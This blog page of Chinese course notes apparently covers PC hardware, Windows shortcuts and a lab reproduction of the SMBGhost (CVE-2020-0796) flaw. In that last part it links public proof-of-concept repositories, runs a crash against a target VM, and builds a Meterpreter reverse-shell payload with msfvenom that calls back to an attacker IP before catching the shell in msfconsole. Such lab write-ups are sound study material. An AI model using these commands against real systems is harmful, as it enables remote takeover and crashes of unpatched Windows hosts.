<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <title>day02 | bulaize2023</title>
  <meta name="keywords" content=" day02 ">
  <meta name="description" content="day02 | bulaize2023">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="HTML标题HTML 标题（Heading）是通过h1 - h6 标签来定义的。 123456&lt;h1&gt;这是标题 1&lt;&#x2F;h1&gt;&lt;h2&gt;这是标题 2&lt;&#x2F;h2&gt;&lt;h3&gt;这是标题 3&lt;&#x2F;h3&gt;&lt;h4&gt;这是标题 4&lt;&#x2F;h4&gt;&lt;h5&gt;这是标题 5&lt;&#x2F;h5&gt;&lt;h6&gt;这是标题 6&amp;l">
<meta property="og:type" content="article">
<meta property="og:title" content="HTML基础">
<meta property="og:url" content="http://example.com/2024/07/12/1.HTML%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="bulaize2023">
<meta property="og:description" content="HTML标题HTML 标题（Heading）是通过h1 - h6 标签来定义的。 123456&lt;h1&gt;这是标题 1&lt;&#x2F;h1&gt;&lt;h2&gt;这是标题 2&lt;&#x2F;h2&gt;&lt;h3&gt;这是标题 3&lt;&#x2F;h3&gt;&lt;h4&gt;这是标题 4&lt;&#x2F;h4&gt;&lt;h5&gt;这是标题 5&lt;&#x2F;h5&gt;&lt;h6&gt;这是标题 6&amp;l">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720778759899-fe744a0b-ab25-43ab-9938-c27a8f27fb9d.png#averageHue=%23eeedec&clientId=u4dc549fb-067d-4&from=paste&height=284&id=ub24a4b0c&originHeight=355&originWidth=307&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=16913&status=done&style=none&taskId=ub6e22bb8-2cbd-4836-b73b-884d9c566f5&title=&width=245.6">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720778846896-e1adbc24-1d36-48a9-9d41-59014e55a7e0.png#averageHue=%23f6f5f3&clientId=u4dc549fb-067d-4&from=paste&height=136&id=u06f026d4&originHeight=170&originWidth=194&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=3612&status=done&style=none&taskId=u74f481e2-8ed4-44a3-b241-72394b98c64&title=&width=155.2">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720778952789-c4d923b3-75dc-41cd-803f-f49b32b5dc99.png#averageHue=%23fffefe&clientId=u4dc549fb-067d-4&from=paste&height=69&id=uce3ca250&originHeight=86&originWidth=235&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=1064&status=done&style=none&taskId=u1d80e14b-4042-46f7-a2b9-2d668ffb839&title=&width=188">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720779646376-c9b68d0d-bb19-440c-81f5-44a6bf936bf8.png#averageHue=%23747771&clientId=u4dc549fb-067d-4&from=paste&height=325&id=u758ad5c5&originHeight=406&originWidth=686&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=288970&status=done&style=none&taskId=u39eec733-eb58-43ec-9632-3b44a1fff6b&title=&width=548.8">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720779663041-6efde4fe-8592-4b00-b17c-9b70af6573cb.png#averageHue=%23fcfcfc&clientId=u4dc549fb-067d-4&from=paste&height=163&id=uc665e7cc&originHeight=204&originWidth=633&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=7085&status=done&style=none&taskId=udcecf3ff-3d48-4a42-a563-80ef790ee29&title=&width=506.4">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720779820002-4c623822-4b8e-4346-a06f-6e6960341bd2.png#averageHue=%23f5f4f4&clientId=u4dc549fb-067d-4&from=paste&height=312&id=u39686eb9&originHeight=390&originWidth=260&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=9856&status=done&style=none&taskId=u47d045f6-bc94-4f3c-a7c6-947d91d23d7&title=&width=208">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720780051550-06b5f532-236b-4834-b73e-70e76baf0e63.png#averageHue=%2383c2e0&clientId=u4dc549fb-067d-4&from=paste&height=662&id=u231d8250&originHeight=828&originWidth=1864&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=332087&status=done&style=none&taskId=ud82b99c0-a3b5-4e81-a9cb-891bf1541ee&title=&width=1491.2">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720780162474-25a809fe-4524-43b9-8d34-71f87c3d7501.png#averageHue=%23eaeaea&clientId=u4dc549fb-067d-4&from=paste&height=749&id=uc7488d1b&originHeight=936&originWidth=1866&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=95002&status=done&style=none&taskId=ufda6d1a1-df9e-469d-aa68-7b6428ecf0c&title=&width=1492.8">
<meta property="article:published_time" content="2024-07-12T12:50:30.000Z">
<meta property="article:modified_time" content="2024-07-12T13:12:39.912Z">
<meta property="article:author" content="bulaize2023">
<meta property="article:tag" content="HTML">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720778759899-fe744a0b-ab25-43ab-9938-c27a8f27fb9d.png#averageHue=%23eeedec&clientId=u4dc549fb-067d-4&from=paste&height=284&id=ub24a4b0c&originHeight=355&originWidth=307&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=16913&status=done&style=none&taskId=ub6e22bb8-2cbd-4836-b73b-884d9c566f5&title=&width=245.6">


<link rel="icon" href="/img/LBJ.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/darcula.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/LBJ.jpg"/>
</a>
<div class="author">
    <span>bulaize2023</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/bulaize2023"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=872336115&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(10)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="第一周">
            
            第一周
            <small>(7)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="第一阶段">
            
            第一阶段
            <small>(3)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="10">
<input type="hidden" id="yelog_site_word_count" value="6.4k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
            <li><a target="_blank" href="https://bulaize2023.github.io/">bulaize2023</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>博客</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>钓鱼</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>计算机网络</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>软件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>社工库</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文章</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>语雀</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>day02</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>GitHub</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>HTML</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MYSQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>nmap</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/12/1.HTML%E5%9F%BA%E7%A1%80/"
           data-tag="HTML"
           data-author="" >
            <span class="post-title" title="HTML基础">HTML基础</span>
            <span class="post-date" title="2024-07-12 20:50:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/12/3.MySQL%E5%9F%BA%E7%A1%80/"
           data-tag="MYSQL"
           data-author="" >
            <span class="post-title" title="MYSQL基础">MYSQL基础</span>
            <span class="post-date" title="2024-07-12 20:30:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/12/%E5%88%A9%E7%94%A8GitHub%E6%90%AD%E5%BB%BAhexo%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/"
           data-tag="GitHub,hexo,博客"
           data-author="" >
            <span class="post-title" title="利用GitHub搭建hexo博客">利用GitHub搭建hexo博客</span>
            <span class="post-date" title="2024-07-12 20:11:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/12/%E5%88%B6%E4%BD%9Cpython%E9%92%93%E9%B1%BC%E7%BD%91%E7%AB%99/"
           data-tag="python,钓鱼"
           data-author="" >
            <span class="post-title" title="制作python钓鱼网站">制作python钓鱼网站</span>
            <span class="post-date" title="2024-07-12 20:11:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/12/%E7%A4%BE%E5%B7%A5%E5%BA%93/"
           data-tag="社工库"
           data-author="" >
            <span class="post-title" title="社工库">社工库</span>
            <span class="post-date" title="2024-07-12 20:00:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/11/2.php%E5%9F%BA%E7%A1%80/"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP基础">PHP基础</span>
            <span class="post-date" title="2024-07-11 20:11:30">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/11/day3/"
           data-tag="计算机网络,nmap"
           data-author="" >
            <span class="post-title" title="day03.计算机网络基础与nmap端口扫描">day03.计算机网络基础与nmap端口扫描</span>
            <span class="post-date" title="2024-07-11 19:11:30">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/11/day2/"
           data-tag="day02"
           data-author="" >
            <span class="post-title" title="day02">day02</span>
            <span class="post-date" title="2024-07-11 18:11:30">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/10/day1%EF%BC%9A%E5%AE%89%E8%A3%85%E8%BD%AF%E4%BB%B6/"
           data-tag="软件"
           data-author="" >
            <span class="post-title" title="安装软件">安装软件</span>
            <span class="post-date" title="2024-07-10 19:11:30">2024/07/10</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/10/%E8%AF%AD%E9%9B%80%E4%B8%8A%E4%BC%A0%E6%96%87%E7%AB%A0/"
           data-tag="语雀,文章"
           data-author="" >
            <span class="post-title" title="语雀上传文章">语雀上传文章</span>
            <span class="post-date" title="2024-07-10 19:11:30">2024/07/10</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-day2" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">day02</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="第一周">第一周</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color1">day02</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2024-07-12 21:02:28'>2024-07-11 18:11</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:534</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E7%94%B5%E8%84%91%E9%80%89%E6%8B%A9"><span class="toc-text">1.电脑选择</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-%E5%B0%B1%E4%B8%9A%E6%83%85%E5%86%B5"><span class="toc-text">2.就业情况</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-Windows%E5%BF%AB%E6%8D%B7%E9%94%AE"><span class="toc-text">3.Windows快捷键</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-text">4.永恒之黑漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#4-1POC-%E8%93%9D%E5%B1%8F"><span class="toc-text">4.1POC(蓝屏)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-2EXP-RCE"><span class="toc-text">4.2EXP(RCE)</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="1-电脑选择"><a href="#1-电脑选择" class="headerlink" title="1.电脑选择"></a>1.电脑选择</h1><p>笔记本VS台式机<br>笔记本优势：便携性强<br>台式机优势：性价比高<br>性能对比：1W笔记本&#x3D;5，6k台式机<br>硬件需求：<br>CPU：至少i5推荐i7（最新一代）<br>显卡：推荐4060以上<br>内存：16G(8*2)起步，有生产力需求建议32G起步，频率DDR4至少3200以上，DRR5至少6000以上（台式机）。<br>笔记本4800频率即T1,5600即T0<br>硬盘：推荐pcie4.0固态硬盘1TB<br>系统：Windows系统分为：家庭版，专业版，企业版，专业工作站版，教育版<br>Windows服务器系统有：2003，2008，2016，2018</p>
<h1 id="2-就业情况"><a href="#2-就业情况" class="headerlink" title="2.就业情况"></a>2.就业情况</h1><p><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720514051546-eca87631-b53d-4660-9c00-28ad61d11478.png#averageHue=%23353f46&clientId=u8ee61bf8-9d4a-4&from=paste&height=421&id=ufe750d83&originHeight=526&originWidth=1580&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=156022&status=done&style=none&taskId=u3bc24803-50ce-4377-87d1-d5df2b18265&title=&width=1264" alt="34cf3fd3b6ef9ee557fe01dddd48702.png"></p>
<h1 id="3-Windows快捷键"><a href="#3-Windows快捷键" class="headerlink" title="3.Windows快捷键"></a>3.Windows快捷键</h1><ul>
<li>复制：<strong>Ctrl</strong> + <strong>C</strong></li>
<li>剪切 <strong>：Ctrl</strong> + <strong>X</strong></li>
</ul>
<p>粘贴：<strong>Ctrl</strong> + <strong>V</strong></p>
<ul>
<li>最大化窗口<strong>：F11</strong>或<strong>Windows徽标键</strong> +<strong>向上键</strong> </li>
<li>打开任务视图<strong>：win</strong> + <strong>Tab</strong></li>
<li>显示和隐藏桌面<strong>：win</strong> + <strong>D</strong> </li>
<li>在打开的应用之间切换 **：Alt **+ <strong>Tab</strong></li>
<li>打开”快速链接”菜单<strong>：win</strong> + <strong>X</strong></li>
<li>锁定电脑：<strong>win</strong> + <strong>L</strong></li>
</ul>
<h1 id="4-永恒之黑漏洞复现"><a href="#4-永恒之黑漏洞复现" class="headerlink" title="4.永恒之黑漏洞复现"></a>4.永恒之黑漏洞复现</h1><h2 id="4-1POC-蓝屏"><a href="#4-1POC-蓝屏" class="headerlink" title="4.1POC(蓝屏)"></a>4.1POC(蓝屏)</h2><p>GitHub下载工具：<a href="https://github.com/eerykitty/CVE-2020-0796-PoC">https://github.com/eerykitty/CVE-2020-0796-PoC</a><br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720514430038-dbbac0e0-5163-42cb-aa78-a5e3de3b116f.png#averageHue=%23ebd09f&clientId=u8ee61bf8-9d4a-4&from=paste&height=714&id=u3d53bbdd&originHeight=892&originWidth=1339&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=119984&status=done&style=none&taskId=u799f63ec-12b1-4ae5-9eca-de1baa688e3&title=&width=1071.2" alt="image.png"><br>解压并拖入到虚拟机中<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720514509331-1ad8ab44-e4fc-42c6-951c-ef4c644651f0.png#averageHue=%231095eb&clientId=u8ee61bf8-9d4a-4&from=paste&height=608&id=u193074e8&originHeight=760&originWidth=960&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=293445&status=done&style=none&taskId=ue89ad2ba-3653-44d3-b399-790d4624744&title=&width=768" alt="image.png"><br>进入文件夹路径输入cmd<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720514580664-ea3cc0b3-eeed-4b32-9f7c-a78b0618b9b9.png#averageHue=%23838281&clientId=u8ee61bf8-9d4a-4&from=paste&height=298&id=u760f5b41&originHeight=373&originWidth=972&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=39066&status=done&style=none&taskId=u749717cb-39dd-4f9f-97a3-fcaebb8e9d3&title=&width=777.6" alt="image.png"><br>输入pip install ntlm_auth下载工具(已安装python环境)<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720514653406-0bea6924-0dec-41dc-8ebb-438889fab4d3.png#averageHue=%2331302e&clientId=u8ee61bf8-9d4a-4&from=paste&height=229&id=uf03316b1&originHeight=286&originWidth=939&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=37088&status=done&style=none&taskId=udd6a1a75-4f9e-4450-a93c-3ca073f3d8a&title=&width=751.2" alt="image.png"><br>输入 python CVE-2020-0796.py  192.168.1.82(靶机ip)<br>前提是两台主机要在同一局域网下且靶机关闭了杀毒软件和防火墙<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720514824950-b8695c8a-eaa7-4c95-948b-e2e262865383.png#averageHue=%230f7fd8&clientId=u8ee61bf8-9d4a-4&from=paste&height=531&id=u115b5597&originHeight=664&originWidth=985&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=54494&status=done&style=none&taskId=uae6557b2-9179-4d21-b378-2141624f820&title=&width=788" alt="image.png"></p>
<h2 id="4-2EXP-RCE"><a href="#4-2EXP-RCE" class="headerlink" title="4.2EXP(RCE)"></a>4.2EXP(RCE)</h2><p>在GitHub上下载工具<br><a href="https://github.com/chompie1337/SMBGhost_RCE_PoC">https://github.com/chompie1337/SMBGhost_RCE_PoC</a><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720515499716-b4bbadd1-7e8a-40c2-96a3-96b76c9c6f99.png#averageHue=%23f1e1b4&clientId=uc09d0013-6118-4&from=paste&height=660&id=u1bfb5855&originHeight=825&originWidth=1451&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=124211&status=done&style=none&taskId=u3cda2218-3e06-425d-a899-b6403425fac&title=&width=1160.8" alt="image.png"><br>将工具解压好拖入kali中<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720515582510-e8a0c23b-d08f-4a69-91b6-61cbe905ad5c.png#averageHue=%23c1e8e5&clientId=uc09d0013-6118-4&from=paste&height=491&id=ue8fcda8f&originHeight=614&originWidth=1291&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=119051&status=done&style=none&taskId=ue2f3bb28-8daa-4d29-a47d-561c7f10f62&title=&width=1032.8" alt="image.png"><br>利用msf生成一个反弹链接的python木马程序并生成一个exploit文件将指令全部保存进去<br>msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.1.101  LPORT&#x3D;5555 -b ‘\x00’ -i 5 -f python &gt; exploit（指令中的ip地址为kaili靶机的ip）<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720519691051-6a6e76d2-040d-48f7-ac82-9110eef85d05.png#averageHue=%23353740&clientId=uc09d0013-6118-4&from=paste&height=190&id=u180dd753&originHeight=237&originWidth=964&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=57737&status=done&style=none&taskId=uc4597720-da30-4ab1-bf8b-1ff170c1787&title=&width=771.2" alt="image.png"><br>使用vim<br>vim exploit                    编辑文件<br>:%s&#x2F;buf&#x2F;USER_PAYLOAD        找到文件中所有的buf关键字并全部替换成 USER_PAYLOAD<br>:wq!               强制保存退出<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720519841997-03effe4f-7989-4d09-be14-1505af2f77cb.png#averageHue=%233e4048&clientId=uc09d0013-6118-4&from=paste&height=626&id=u95d44e63&originHeight=782&originWidth=699&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=236752&status=done&style=none&taskId=uddfd115f-9aef-4125-880e-c6265a1966e&title=&width=559.2" alt="image.png">将exploit文件中的所有内容复制粘贴到exploit.py中去<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520012557-e4793ccd-1fb9-4e90-85ff-702c6199a43a.png#averageHue=%23252831&clientId=uc09d0013-6118-4&from=paste&height=639&id=u4b5d0fd9&originHeight=799&originWidth=1181&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=281769&status=done&style=none&taskId=u0bb50049-2e5b-418c-8091-df56c8740b7&title=&width=944.8" alt="image.png">进入msfconsole<br> <img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520132513-e08c5efe-0f8b-4e66-bd80-306d9ee314e8.png#averageHue=%2332343d&clientId=uc09d0013-6118-4&from=paste&height=460&id=u80044bb7&originHeight=575&originWidth=613&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=66112&status=done&style=none&taskId=u2dd69c64-dbde-41af-b54e-88459eb828f&title=&width=490.4" alt="image.png">use exploit&#x2F;multi&#x2F;handler<br>set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp<br>show options<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520241337-af2ec7af-6652-4383-a6d5-c4035acfae10.png#averageHue=%2332343d&clientId=uc09d0013-6118-4&from=paste&height=317&id=uffb45d96&originHeight=396&originWidth=828&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=56969&status=done&style=none&taskId=ud92d70d8-62dc-4949-b261-1cb16801e09&title=&width=662.4" alt="image.png"><br>set lhost kali的ip<br>set lport 5556<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520304834-90b5b827-a67e-4ccd-acd0-b576869b7338.png#averageHue=%2331333c&clientId=uc09d0013-6118-4&from=paste&height=319&id=u4cd6f6a9&originHeight=399&originWidth=841&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=54705&status=done&style=none&taskId=u0542ef68-fb50-41c2-958a-42d78d2b6db&title=&width=672.8" alt="image.png"><br>run开始监听<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520363695-492aa2f6-096c-4cb6-b91d-15dbf387535d.png#averageHue=%232f333e&clientId=uc09d0013-6118-4&from=paste&height=62&id=ue9e7e136&originHeight=77&originWidth=484&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=9689&status=done&style=none&taskId=uda1a4f3b-0394-4997-af21-22daba8287e&title=&width=387.2" alt="image.png"><br>打开另一个终端页面输入python exploit.py -ip 目标ip<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520467685-8556f88b-3d55-4774-8c0b-a499c76d68d0.png#averageHue=%23265076&clientId=uc09d0013-6118-4&from=paste&height=667&id=udfe560fa&originHeight=834&originWidth=1714&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=204609&status=done&style=none&taskId=u53d134c6-af81-4890-81af-96aeddc8a1f&title=&width=1371.2" alt="image.png"><br>成功获取到shell数据截图<br><img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1720520753142-9b77d64d-0ac2-4ef3-b350-268db1051a19.png#averageHue=%2331313e&clientId=uc09d0013-6118-4&from=paste&height=177&id=u4ff184be&originHeight=221&originWidth=758&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=67035&status=done&style=none&taskId=uc7505bf7-fcde-4ba3-9448-01adc69d0b0&title=&width=606.4" alt="image.png"></p>

      
